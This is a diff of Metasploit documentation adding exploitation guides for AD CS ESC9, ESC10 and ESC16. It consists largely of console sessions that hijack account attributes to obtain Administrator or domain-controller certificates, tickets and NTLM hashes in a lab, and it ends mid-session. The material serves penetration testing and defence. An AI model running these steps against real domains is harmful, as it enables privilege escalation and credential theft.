  CertificateMappingMethods` contains `UPN` bit aka `0x4` or `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
  StrongCertificateBindingEnforcement` is set to `0`.
  - [Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and
    more!](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc10]]
 - ESC11 - Relaying NTLM to ICPR - Relaying NTLM authentication to unprotected RPC interface is allowed due to lack of
  the `IF_ENFORCEENCRYPTICERTREQUEST` flag on `Config.CA.Interface.Flags`.
  - [Relaying to AD Certificate Services over
@@ -115,9 +124,10 @@ Later, additional techniques were disclosed by security researchers:
  manipulation
  - [EKUwu: Not just another AD CS ESC](https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc)
  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc15]]
-
-Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, ESC4, ESC8, ESC13 and ESC15. As such, this page only
-covers exploiting that subset of ESC flaws.
+- ESC16 - Security Extension Disabled on CA (Globally)
+  - [ESC16 - Security Extension Disabled on CA](https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally)
+Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, ESC4, ESC8, ESC9, ESC10, ESC13, ESC15 and ESC16.
+- [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc16]]

 Before continuing, it should be noted that ESC1 is slightly different than ESC2 and ESC3
 as the diagram notes above. This is because in ESC1, one has control over the
@@ -921,6 +931,392 @@ msf auxiliary(server/relay/esc8) >
 [*] Identity: MSFLAB\smcintyre - All targets relayed to
 ```

+# Overview of exploiting ESC9 and ESC10 with Metasploit
+
+ESC9 and ESC10 are similar certificate misconfiguration abuse techniques. They both involve having credentials of a
+user, say "user1", who has GenericWrite privileges over "user2". This allows an attacker as "user1" to update either the
+`userPrincipalName` or `dNSHostName` attribute of "user2". In order to update the attribute, we need to authenticate 
+via LDAP - which is a unique requirement compared to the  other ESC techniques and is why there is a separated
+module called `esc_update_ldap_object` which combines the attribute update via LDAP and certificate issuance process.
+
+If the AD CS server is configured to allow "weak certificate mappings" when a user is requesting a certificate, the
+server will check the `userPrincipalName` or the `dNSHostName` of the requesting identity and then issue a certificate
+based on that value.  Therefore if we can update "user2"'s UPN to "Administrator" and then request a certificate on
+behalf of "user2" we can get an Administrator certificate (easy priv esc horay). That is the essence of both ESC9 and
+ESC10 minus a number of details we'll get into.
+
+It's also worth noting that the following registry keys and preventative measure and exploit techniques (ESC9 and 10) all stem from
+Microsoft attempts to patch CVE-2022–26923 (aka Certifried). During this effort they implemented the new
+`szOID_NTDS_CA_SECURITY_EXT` security extension for issued certificates, which will embed the `objectSid`
+property of the requester, to help facilitate "strong certificate mappings", along with the following registry keys
+and certificate template flags.
+
+## StrongCertificateBindingEnforcement
+Located in: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc`
+
+This registry key defines what is considered weak and strong certificate mappings for **Kerberos authentication**. Possible values:
+
+| Setting | Method                                                                                           | Strength assessment |
+| ------- |--------------------------------------------------------------------------------------------------|---------------------|
+| 0       | No strong certificate mapping checks are done                                                    | weak                |
+| 1       | Will use strong mapping if present though can be ignored if CT_FLAG_NO_SECURITY_EXTENSION is set | weak                |
+| 2       | Full Enforcement Mode (No weak mappings allowed)                                                 | strong              |
+
+In order to exploit these certificate misconfiguration we will need the value of  `StrongCertificateBindingEnforcement` to be either `0` or `1`.
+If the value is set to `2` we cannot exploit the misconfiguration using Kerberos authentication.
+
+## CertificateMappingMethods
+Located in: `HKLM\System\CurrentControlSet\Control\SecurityProviders\Schannel`
+
+This registry key defines what is considered weak and strong certificate mappings for **Schannel authentication**. Possible values:
+
+| Bit | Setting | Method                                | Strength assessment |
+| --- | ------- | ------------------------------------- | ------------------- |
+| 1   | 0x0001  | Subject/Issuer certificate mapping    | weak                |
+| 2   | 0x0002  | Issuer certificate mapping            | weak                |
+| 3   | 0x0004  | UPN certificate mapping               | weak                |
+| 4   | 0x0008  | S4U2Self certificate mapping          | strong              |
+| 5   | 0x0010  | S4U2Self explicit certificate mapping | strong              |
+| 1-5 | 0x001F  | All of the above values               | weak                |
+
+In order to exploit these certificate misconfiguration using Schannel authentication we will need the value of
+`CertificateMappingMethods` to be `UPN certificate mapping` (or `All the above values`)
+
+
+## CT_FLAG_NO_SECURITY_EXTENSION
+Certificate templates now include an attribute called `msPKI-Enrollment-Flag`. The `msPKI-Enrollment-Flag` attribute
+defines how certificate enrollment behaves by enabling or disabling specific behaviors via a bitmask of flags. If the
+attribute contains the value:`0x00080000` (aka `CT_FLAG_NO_SECURITY_EXTENSION`) then the `szOID_NTDS_CA_SECURITY_EXT`
+is not included and we can exploit weak certificate mappings even if `StrongCertificateBindingEnforcement` is set to 1.
+
+
+## Changing userPrincipalName vs dNSHostName
+Both can be used to exploit the certificate misconfiguration. It should be noted that normal users don't have a `dNSHostName`
+attribute, only machine accounts do.
+
+# Exploiting ESC9
+## ESC9 Scenario 1
+Pre-requisites:
+- `StrongCertificateBindingEnforcement` is set to `1` (if it's set to `0` exploitation will still work but technically you're exploiting ESC10 in that case)
+- A vulnerable certificate template has the `CT_FLAG_NO_SECURITY_EXTENSION` flag set. 
+- The same vulnerable template has the `SubjectAltRequireUPN` flag set.
+- The same vulnerable template has a client authentication EKU
+- We have credentials of a user who has `GenericWrite` privileges over another user that can enroll in the vulnerable template
+
+```
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
+...
+[+] Template: ESC9-Template
+[*]   Distinguished Name: CN=ESC9-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=kerberos,DC=issue
+[*]   Manager Approval: Disabled
+[*]   Required Signatures: 0
+[!]   Potentially vulnerable to: ESC9 (the template is in a vulnerable configuration but in order to exploit registry key StrongCertificateBindingEnforcement must not be set to 2)
+[*]   Notes:
+[*]     * ESC9: Template has msPKI-Enrollment-Flag set to 0x80000 (CT_FLAG_NO_SECURITY_EXTENSION) and specifies a client authentication EKU and user1 has write privileges over user2 and the template has a subjectAltName (UPN or DNS) requirement
+[*]  Certificate Template Write-Enabled SIDs:
+[*]     * S-1-5-21-2324486357-3075865580-3606784161-1602 (user1)
+[*]     * S-1-5-21-2324486357-3075865580-3606784161-1603 (user2)
+[*]     * S-1-5-11 (Authenticated Users)
+[*]   Certificate Template Enrollment SIDs:
+[*]     * S-1-5-21-2324486357-3075865580-3606784161-1602 (user1)
+[*]     * S-1-5-21-2324486357-3075865580-3606784161-1603 (user2)
+[*]     * S-1-5-11 (Authenticated Users)
+...
+```
+Now we can see the above template is possibly exploitable if the `StrongCertificateBindingEnforcement` is set to `1`. In 
+our case it is so we can proceed with exploitation. 
+
+We will set a number of datastore options in order to exploit ESC9 in this scenario.
+We will set `RHOSTS`, `CERT_TEMPLATE`, and `CA` as we normally would. In order to update the UPN of the
+target user we must connect to LDAP and so the datastore options `LDAPUsername`, `LDAPPassword`, and `LDAPDomain`
+are the credentials of the user who has `GenericWrite` privileges over the `TARGET_USERNAME`. Note `LDAPRport` must be
+set in order to connect however it defaults to 389.
+
+The option `UPDATE_LDAP_OBJECT` is an enum that can be set to either `userPrincipalName`  or `dNSHostName` and must be
+set in order to instruct the module to attempt to exploit ESC9 or ESC10. We will set `UPDATE_LDAP_OBJECT` to
+`userPrincipalName` in this case and so we then must set `UPDATE_LDAP_OBJECT_VALUE` to `Administrator`.
+
+It's important for this scenario, when updating the UPN to omit the domain suffix from the UPN to avoid conflicts with
+other UPNs in the domain, which by default all contain the suffix. The UPN processing order will still allow the DC to
+map the UPN Administrator in our writable account to the actual administrator, making its impersonation possible.
+
+It's also important to note that after issuing the certificate we must revert the `userPrincipalName` of the
+`TARGET_USERNAME` back to the original value before attempting to use the certificate or the certificate will not work. 
+This is done automatically by the module. 
+
+In the following example, the ESC9-Template template is vulnerable to ESC9 and will yield a ticket for Administrator once complete. 
+
+```
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldaprport 389
+ldaprport => 389
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username user2
+target_username => user2
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapdomain kerberos.issue
+ldapdomain => kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldappassword N0tpassword!
+ldappassword => N0tpassword!
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapusername user1
+ldapusername => user1
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set cert_template ESC9-Template
+cert_template => SpencerTest
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ca kerberos-DC2-CA
+ca => kerberos-DC2-CA
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT_VALUE Administrator
+UPDATE_LDAP_OBJECT_VALUE => Administrator
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: user2
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[+] The operation completed successfully!
+[*] 172.16.199.200:445 - Adding shadow credentials for user2
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] Certificate stored at: /Users/jheysel/.msf4/loot/20250717140905_default_172.16.199.200_windows.ad.cs_563081.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 2ff08c15-0ab3-98ad-ee0b-3fd1fbcf3e9d
+[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
+[*] 172.16.199.200:445 - Getting hash for user2
+[!] Warning: Provided principal and realm (user2@kerberos.issue) do not match entries in certificate:
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717140905_default_172.16.199.200_mit.kerberos.cca_263627.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for user2@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717140905_default_172.16.199.200_mit.kerberos.cca_015140.bin
+[+] Found NTLM hash for user2: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.16.199.200:445 - Certificate UPN: Administrator
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250717140907_default_172.16.199.200_windows.ad.cs_548728.pfx
+[*] 172.16.199.200:445 - reverting ldap object
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] No matching entries found - check device ID
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: Administrator
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to user2...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to user2
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+```
+We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) as the `Administrator`
+domain administrator. See the [Getting A Kerberos Ticket](#getting-a-kerberos-ticket) section for more information.
+
+## ESC9 Scenario 2
+Pre-requisites:
+- `StrongCertificateBindingEnforcement` is set to `1` (if it's set to `0` exploitation will still work but technically you're exploiting ESC10 in that case)
+- A vulnerable certificate template has the `CT_FLAG_NO_SECURITY_EXTENSION` flag set.
+- The same vulnerable template has the `SubjectAltRequireDNS` flag set. <--- (Difference 1/2 between pre-requisites in scenario 1 and 2)
+- The same vulnerable template has a client authentication EKU
+- We have credentials of a machine account who has `GenericWrite` privileges over another **machine account** that can enroll in the vulnerable template <--- (Difference 2/2 between pre-requisites in scenario 1 and 2)
+  - Only machine accounts can have the `dNSHostName` attribute set, so our "target_user" needs to be machine account
+
+The option `UPDATE_LDAP_OBJECT` will now be set to `dNSHostName` and because only machine accounts have the `dNSHostName` attribute we will set our `TARGET_USER` to the machine account`Test2$`
+We will be changing the `dNSHostName` of the machine account `Test1$` to `DC2.kerberos.issue` (`DC2` is the hostname of the domain controller) in hopes to impersonate the Domain Controller machine account
+
+`CERT_TEMPLATE` will be set to `ESC9-Template-Dns` which is the same template as `ESC9-Template` but with the `SubjectAltRequireDNS` flag set instead of the `SubjectAltRequireUPN` flag.
+
+```
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldaprport 389
+ldaprport => 389
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username "Test2$"
+target_username => Test2$
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT_VALUE dc2.kerberos.issue
+UPDATE_LDAP_OBJECT_VALUE => dc2.kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT dnsHostName
+UPDATE_LDAP_OBJECT => dNSHostName
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set CA kerberos-DC2-CA
+CA => kerberos-DC2-CA
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set CERT_TEMPLATE ESC9-Template-Dns
+CERT_TEMPLATE => ESC9-Template-Dns
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapdomain kerberos.issue
+ldapdomain => kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldappassword N0tpassword!
+ldappassword => N0tpassword!
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapusername Test1$
+ldapusername => Test1$
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Reloading module...
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of Test2$'s dNSHostName:
+[*] Attempting to update dNSHostName for CN=Test2,CN=Computers,DC=kerberos,DC=issue to dc2.kerberos.issue...
+[+] Successfully updated CN=Test2,CN=Computers,DC=kerberos,DC=issue's dNSHostName to dc2.kerberos.issue
+[+] The operation completed successfully!
+[*] 172.16.199.200:445 - Adding shadow credentials for Test2$
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] Certificate stored at: /Users/jheysel/.msf4/loot/20250717141705_default_172.16.199.200_windows.ad.cs_907188.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 517757a2-5174-5c43-6005-102c4429ff05
+[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
+[*] 172.16.199.200:445 - Getting hash for user2
+[!] Warning: Provided principal and realm (Test2$@kerberos.issue) do not match entries in certificate:
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717141705_default_172.16.199.200_mit.kerberos.cca_132784.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for Test2$@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717141705_default_172.16.199.200_mit.kerberos.cca_364943.bin
+[+] Found NTLM hash for Test2$: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.16.199.200:445 - Certificate DNS: dc2.kerberos.issue
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250717141706_default_172.16.199.200_windows.ad.cs_369517.pfx
+[*] 172.16.199.200:445 - reverting ldap object
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[+] Deleted entry with device ID 517757a2-5174-5c43-6005-102c4429ff05
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Attempting to delete attribute dNSHostName from CN=Test2,CN=Computers,DC=kerberos,DC=issue...
+[+] Successfully deleted attribute dNSHostName from CN=Test2,CN=Computers,DC=kerberos,DC=issue
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhosts=172.16.199.200 cert_file=/Users/jheysel/.msf4/loot/20250717141706_default_172.16.199.200_windows.ad.cs_369517.pfx
+[*] Running module against 172.16.199.200
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717142328_default_172.16.199.200_mit.kerberos.cca_370847.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for dc2$@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717142328_default_172.16.199.200_mit.kerberos.cca_596103.bin
+[+] Found NTLM hash for dc2$: aad3b435b51404eeaad3b435b51404ee:cceede79c156a295f45e7ad38ee2f884
+[*] Auxiliary module execution completed
+```
+
+# Exploiting ESC10
+## ESC10 Scenario 1
+Pre-requisites:
+- `StrongCertificateBindingEnforcement` is set to `0`
+- Because the above is set to `0` we don't need the `CT_FLAG_NO_SECURITY_EXTENSION` flag set on the vulnerable template
+- Other than the above, pre-requisites and exploitation are the exact same as ESC9 Scenario 1
+
+## ESC10 Scenario 2
+Pre-requisites: 
+- `CertificateMappingMethods` is set to `0x0004` (UPN certificate mapping) or `0x001F` (All of the above values)
+- The vulnerable template has the `SubjectAltRequireUPN` set
+- The same vulnerable template has a client authentication EKU
+- We have credentials of a machine account who has `GenericWrite` privileges over another machine account that can enroll in the vulnerable template
+
+In this scenario we can only compromise accounts that do not already have a populated `userPrincipalName` attribute, such as machine accounts and the default domain administrator.
+In addition, because this registry key only applies to SChannel authentication we are forced to authenticate to LDAPS once we get a certificate.
+
+```
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldaprport 389
+ldaprport => 389
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username "user2"
+target_username => user2
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT_VALUE 'DC2$@kerberos.issue'
+UPDATE_LDAP_OBJECT_VALUE => DC2$@kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT userPrincipalName
+UPDATE_LDAP_OBJECT => userPrincipalName
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set CA kerberos-DC2-CA
+CA => kerberos-DC2-CA
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set CERT_TEMPLATE ESC10-Template
+CERT_TEMPLATE => ESC10-Template
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapdomain kerberos.issue
+ldapdomain => kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldappassword N0tpassword!
+ldappassword => N0tpassword!
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapusername user1
+ldapusername => user1
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: user2
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to DC2$@kerberos.issue...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to DC2$@kerberos.issue
+[+] The operation completed successfully!
+[*] 172.16.199.200:445 - Adding shadow credentials for user2
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] Certificate stored at: /Users/jheysel/.msf4/loot/20250717143323_default_172.16.199.200_windows.ad.cs_860225.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 825a1a2f-336f-e41c-24fb-703bb79f79f9
+[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
+[*] 172.16.199.200:445 - Getting hash for user2
+[!] Warning: Provided principal and realm (user2@kerberos.issue) do not match entries in certificate:
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717143323_default_172.16.199.200_mit.kerberos.cca_872380.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for user2@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717143323_default_172.16.199.200_mit.kerberos.cca_123025.bin
+[+] Found NTLM hash for user2: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.1 (Server Authentication)
+[*] 172.16.199.200:445 -   * 1.3.6.1.4.1.311.20.2.2 (Smart Card Logon)
+[*] 172.16.199.200:445 - Certificate UPN: DC2$@kerberos.issue
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250717143324_default_172.16.199.200_windows.ad.cs_752634.pfx
+[*] 172.16.199.200:445 - reverting ldap object
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[+] Deleted entry with device ID 825a1a2f-336f-e41c-24fb-703bb79f79f9
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: DC2$@kerberos.issue
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to user2...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to user2
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > use ldap_login
+[*] Using auxiliary/scanner/ldap/ldap_login
+[*] The CreateSession option within this module can open an interactive session
+
+msf6 auxiliary(scanner/ldap/ldap_login) > run ssl=true rhosts=172.16.199.200 LDAP::Auth=schannel LDAP::CertFile=/Users/jheysel/.msf4/loot/20250717143324_default_172.16.199.200_windows.ad.cs_752634.pfx
+[+] Success: 'Cert File /Users/jheysel/.msf4/loot/20250717143324_default_172.16.199.200_windows.ad.cs_752634.pfx'
+[*] LDAP session 1 opened (172.16.199.1:58674 -> 172.16.199.200:389) at 2025-07-17 14:35:08 -0700
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Bruteforce completed, 1 credential was successful.
+[*] 1 LDAP session was opened successfully.
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/ldap/ldap_login) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type  Information                     Connection
+  --  ----  ----  -----------                     ----------
+  1         ldap  LDAP DC2$ @ 172.16.199.200:389  172.16.199.1:58674 -> 172.16.199.200:389 (172.16.199.200)
+
+```
+
 # Exploiting ESC13
 To exploit ESC13, we need to target a certificate that has an issuance policy linked to a universal group in Active
 Directory. Unlike some of the other ESC techniques, successfully exploiting ESC13 isn't necessarily guaranteed to yield
@@ -1084,6 +1480,168 @@ msf auxiliary(admin/dcerpc/icpr_cert) >

 Finally, *this* certificate can be used to authenticate to Kerberos with the `kerberos/get_ticket` module.

+# Exploiting ESC16
+ESC16 refers to a CA-level misconfiguration where the SID security extension (OID `1.3.6.1.4.1.311.25.2`), introduced in
+the May 2022 KB5014754 update, is globally disabled. This extension allows domain controllers to securely map
+certificates to user or computer SIDs for strong authentication.
+
+When this OID is listed under the CA’s `DisableExtensionList` registry key, which is located:
+`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA-Name>\PolicyModules\<PolicyModuleName>\`
+all certificates issued by the CA will lack the SID binding, making every template behave as though it has the 
+`CT_FLAG_NO_SECURITY_EXTENSION` flag (essentially ESC9). After updating the `DisableExtensionList` the machine will need
+to be restarted for the changes to take effect. The `DisableExtensionList` under the default policy can be updated in
+order to exploit (a new policy is not required).
+
+## ESC16 Scenario 1
+If domain controllers aren’t in Full Enforcement mode (`StrongCertificateBindingEnforcement` != 2), they fall back to
+weaker mapping methods like UPN or DNS from the certificate’s SAN potentially reintroducing risks similar to the
+Certifried vulnerability (CVE-2022-26923) or ESC9 however for our purposes given the `DisableExtensionList` is called 
+"ESC16 Scenario 1". The way you exploit ESC16 scenario 1 with Metasploit is identical to how you would exploit ESC9:
+
+```
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldaprport 389
+ldaprport => 389
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username user2
+target_username => user2
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapdomain kerberos.issue
+ldapdomain => kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldappassword N0tpassword!
+ldappassword => N0tpassword!
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapusername user1
+ldapusername => user1
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT_VALUE Administrator
+UPDATE_LDAP_OBJECT_VALUE => Administrator
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ca kerberos-dc2-ca
+ca => kerberos-dc2-ca
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set cert_template ESC16-Template
+cert_template => ESC16-Template
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: user2
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
